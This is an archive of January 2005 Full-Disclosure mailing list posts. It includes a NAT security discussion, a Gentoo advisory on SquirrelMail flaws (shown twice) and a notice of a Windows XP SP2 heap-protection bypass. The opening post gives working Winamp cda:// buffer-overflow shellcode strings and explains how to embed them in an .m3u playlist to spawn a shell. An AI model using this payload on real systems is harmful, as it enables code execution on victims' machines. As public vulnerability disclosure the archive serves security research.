I wrote the scode sometime ago, in http://foro.elhacker.net Its a very very simple scode, with hardcoded system() call (im a noob, sorry xD)

I have used AAAABBBBCCCC... to see how big is the buffer, and to see where the ret is overflowed (in 5.08 exactly in HIII)

In Winamp 5.05 works the same code, but the ret is "IIII", so the exploit must have another "H":

 cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHnT _IJJJ3WEcEmEdE.EeExEeDwP]S

Then, the exploit works fine in Winamp 5.05 and spawns a shell :)

I have only tested it in 5.08 and 5.05, but I think that its easy to "port" the exploit to another version.

These codes can be saved in a archive type m3u (playlist archive Winamp)

If you copy these codes in a text archive like this (Winamp 5.08):

#EXTM3U
#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ3WEcEmEdE.EeExEeDwP]S

(for example, i have used the "demo" archive, DJ Mike Llama and edit the PLAY LIST ENTRY)

And save as *.m3u file, if you open this (in this case, I repeat, with Winamp 5.08), a cmd shell will appear :)

Its trivial to change the shellcode to make a bindport, reverse shell, etc..

Sorry about my bad english, Im spanish :) (Spain exists :D)

Greets to http://www.elhacker.net and http://foro.elhacker.net and all the people I know, especially "her" (Isthar) :)

THE REAL ELHACKER.NET! :D

Best regards.

Rojodos

rojo2_bugtraqyahoo.es
2005-01-28

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] NAT router inbound network traffic subversion

From: Joe (joejretrading.com)
Date: Fri Jan 28 2005 - 06:42:28 CST


In message <1106892739.9371.26.camellocalhost.localdomain>, Kristian
Hermansen <khermansenht-technology.com> writes
>I have Googled around and asked a highly-respected Professor at my
>University whether it is possible to direct packets behind a NAT router
>without the internal 192.168.x.x clients first requesting a connection
>to the specific host outside. The answer I received is "not possible".
>I also asked if this can be thought of as a security feature, to which
>the reply was again "yes".

Yes. But see later.
>
>Now, I wouldn't place all my bets on his answer and I am calling on
>someone out there to clear up my question. If NAT really does only
>allow inbound connections with a preliminary request as he suggests, it
>seems that the only way to get an "unauthorized" packet behind the
>router is by some flaw in the firmware of the device.

If you are not offering any services to the Internet, yes. If you are,
then you have ports open on the router, redirecting to real machines,
which may be running software which can be exploited. This is how worms
spread. the home user is unlikely to be hit by a worm, unless they are
running a Windows NT-derived operating system, such as XP, without a
firewall and/or NAT device. Commercial installations such as web servers
are the main targets for worms.
>
>How about if the client has requested a connection to Google.com from
>behind his Linksys home NAT router: would it be possible for an outside
>attacker to spoof packets from Google's IP to get packets into the
>network? Or do we need to know the sequence numbers as well? Or is
>there an even more devious way to get packets on the inside without a
>client's initiative?

Google for "man in the middle" attack.
>
>Has there been any research into this? Are there statistics on worm
>propagation and exploited network hosts in relation to those individuals
>that did not own routers (and instead connected directly to their
>modem)? If *all* home users on the Internet had NAT routers during the
>summer of 2003, would we have significantly slowed the spread of
>Blaster? I believe these all to be very important questions and the
>security aspects of the ability to route packets behind NAT really
>interests me...maybe some of you can elaborate :-)

Worms are not usually an issue for home users, except when someone sells
an operating system with ports open to the Internet by default. XP
pre-service pack 2 is such an operating system. Its users were duly
hammered by worms, and would not have been if they used the built-in
firewall, which was not enabled by default. I'm not sure how much a NAT
device would have helped on its own. Modern versions of Windows are
extremely talkative, and it may well have invited the bad guys in of its
own accord. But widespread use of the firewall would have stopped it.

More troublesome for home users are viruses spread by email, which
initiate connections through the firewall, router or other device from
the inside. The security device cannot generally tell whether the user
or a virus has made the request, though third-part 'personal' firewalls,
running on the user's workstation, are becoming quite good at this.

I don't think Internet Explorer currently runs any code in an incoming
email automatically, as it once did, but it's not hard to persuade many
users to click on a button and run the virus themselves. Most viruses
are now also worms, they will attempt to spread both by email and by
direct contact with unprotected machines.
--
Joe
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Mail Delivery (failure full-disclosurelists.netsys.com)

tssiki.fi
Date: Thu Mar 03 2005 - 03:52:28 CST


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
[Full-Disclosure] [gentoo-announce] [ GLSA 200501-39 ] SquirrelMail: Multiple vulnerabilities

From: Sune Kloppenborg Jeppesen (jaervoszgentoo.org)
Date: Fri Jan 28 2005 - 08:46:32 CST


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-39
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: SquirrelMail: Multiple vulnerabilities
      Date: January 28, 2005
      Bugs: #78116
        ID: 200501-39

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

SquirrelMail fails to properly sanitize user input, which could lead to
arbitrary code execution and compromise webmail accounts.

Background
==========

SquirrelMail is a webmail package written in PHP. It supports IMAP and
SMTP and can optionally be installed with SQL support.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 mail-client/squirrelmail <= 1.4.3a-r2 >= 1.4.4

Description
===========

SquirrelMail fails to properly sanitize certain strings when decoding
specially-crafted strings, which can lead to PHP file inclusion and
XSS.

* Insufficient checking of incoming URLs in prefs.php (CAN-2005-0075)
  and in webmail.php (CAN-2005-0103).

* Insufficient escaping of integers in webmail.php (CAN-2005-0104).

Impact
======

By sending a specially-crafted URL, an attacker can execute arbitrary
code from the local system with the permissions of the web server.
Furthermore by enticing a user to load a specially-crafted URL, it is
possible to display arbitrary remote web pages in Squirrelmail's
frameset and execute arbitrary scripts running in the context of the
victim's browser. This could lead to a compromise of the user's webmail
account, cookie theft, etc.

Workaround
==========

The arbitrary code execution is only possible with "register_globals"
set to "On". Gentoo ships PHP with "register_globals" set to "Off" by
default. There are no known workarounds for the other issues at this
time.

Resolution
==========

All SquirrelMail users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=mail-client/squirrelmail-1.4.4"

Note: Users with the vhosts USE flag set should manually use
webapp-config to finalize the update.

References
==========

  [ 1 ] SquirrelMail Advisory
        http://sourceforge.net/mailarchive/message.php?msg_id=10628451
  [ 2 ] CAN-2005-0075
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0075
  [ 3 ] CAN-2005-0103
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0103
  [ 4 ] CAN-2005-0104
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0104

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-39.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBB+lBNzKC5hMHO6rkRAilCAKCAGnSPl1F9dpD33JKLlGpY8kCfAwCgioYM
CYFdx/qsQ4tQk6oLbCVizxU=
=D6Jm
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [ GLSA 200501-39 ] SquirrelMail: Multiple vulnerabilities

From: Sune Kloppenborg Jeppesen (jaervoszgentoo.org)
Date: Fri Jan 28 2005 - 08:46:32 CST


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-39
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: SquirrelMail: Multiple vulnerabilities
      Date: January 28, 2005
      Bugs: #78116
        ID: 200501-39

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

SquirrelMail fails to properly sanitize user input, which could lead to
arbitrary code execution and compromise webmail accounts.

Background
==========

SquirrelMail is a webmail package written in PHP. It supports IMAP and
SMTP and can optionally be installed with SQL support.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 mail-client/squirrelmail <= 1.4.3a-r2 >= 1.4.4

Description
===========

SquirrelMail fails to properly sanitize certain strings when decoding
specially-crafted strings, which can lead to PHP file inclusion and
XSS.

* Insufficient checking of incoming URLs in prefs.php (CAN-2005-0075)
  and in webmail.php (CAN-2005-0103).

* Insufficient escaping of integers in webmail.php (CAN-2005-0104).

Impact
======

By sending a specially-crafted URL, an attacker can execute arbitrary
code from the local system with the permissions of the web server.
Furthermore by enticing a user to load a specially-crafted URL, it is
possible to display arbitrary remote web pages in Squirrelmail's
frameset and execute arbitrary scripts running in the context of the
victim's browser. This could lead to a compromise of the user's webmail
account, cookie theft, etc.

Workaround
==========

The arbitrary code execution is only possible with "register_globals"
set to "On". Gentoo ships PHP with "register_globals" set to "Off" by
default. There are no known workarounds for the other issues at this
time.

Resolution
==========

All SquirrelMail users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=mail-client/squirrelmail-1.4.4"

Note: Users with the vhosts USE flag set should manually use
webapp-config to finalize the update.

References
==========

  [ 1 ] SquirrelMail Advisory
        http://sourceforge.net/mailarchive/message.php?msg_id=10628451
  [ 2 ] CAN-2005-0075
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0075
  [ 3 ] CAN-2005-0103
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0103
  [ 4 ] CAN-2005-0104
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0104

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-39.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBB+lBNzKC5hMHO6rkRAilCAKCAGnSPl1F9dpD33JKLlGpY8kCfAwCgioYM
CYFdx/qsQ4tQk6oLbCVizxU=
=D6Jm
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [ Positive Technologies ] Defeating Microsoft Windows XP SP2 Heap protection

aanisimovptsecurity.ru
Date: Fri Jan 28 2005 - 08:41:17 CST


It was discovered by MaxPatrol team that it is possible to defeat Microsoft Windows XP SP2 Heap protection and Data Execution Prevention mechanism.

As a result it is possible to implement:
- Arbitrary memory region write access (smaller or equal to 1016 bytes);
- Arbitrary code execution;
- DEP bypass.

Details are described in the article:

http://www.maxpatrol.com/ptmshorp.asp

--
Best regards,
 aanisimov mailto:aanisimovptsecurity.ru

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Update

From: Bugzilla (bugzillaredhat.com)
Date: Fri Jan 28 2005 - 09:48:14 CST